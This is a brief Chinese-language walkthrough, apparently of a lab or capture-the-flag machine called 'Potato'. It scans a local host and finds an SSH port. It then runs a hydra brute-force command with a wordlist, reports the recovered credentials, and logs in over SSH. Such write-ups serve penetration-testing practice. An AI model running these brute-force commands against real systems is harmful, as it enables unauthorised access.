arp-scan -l 扫描IP
使用御剑端口扫描扫描端口,扫到了80和7120两个端口,其中7120为ssh端口
使用dirb http://192.168.171.134 扫描目录
发现info.php 访问为phpinfo界面
访问192.168.171.134为一个大土豆,没什么用
所以我们从ssh入手
盲猜账号为potato 我们使用九头蛇hydra(或图形化xhydra)来进行爆破密码
命令行为:
hydra -l potato -P /usr/share/wordlists/nmap.lst ssh://192.168.171.134:7120
我们就得到了账号为potato,密码为letmein
这样我们就知道了ssh的账号密码,直接连接就可以获得shell了
ssh -p 7120 potato@192.168.171.134